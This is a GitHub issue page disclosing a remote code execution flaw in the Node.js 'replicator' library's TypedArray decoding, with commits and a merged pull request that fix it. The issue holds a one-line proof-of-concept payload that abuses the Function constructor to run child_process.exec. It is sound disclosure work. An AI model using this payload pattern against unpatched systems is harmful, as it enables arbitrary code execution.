We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The current TypedArray code leads to an RCE:
const Replicator = require('replicator'); const replicator = new Replicator(); replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":" require(\'child_process\').exec(\'calc\')"}}}}]')
Discovered by Yaniv Nizry (https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx.”
The text was updated successfully, but these errors were encountered:
test: add a tets for GH-16
7c02185
8951369
5ebef59
Merge pull request #17 from inikulin/sec
2c62624
fix: Avoid RCE when deserialising TypedArrays [closes #16][part of #12]
Successfully merging a pull request may close this issue.
The current TypedArray code leads to an RCE:
Discovered by Yaniv Nizry (https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx.”
The text was updated successfully, but these errors were encountered: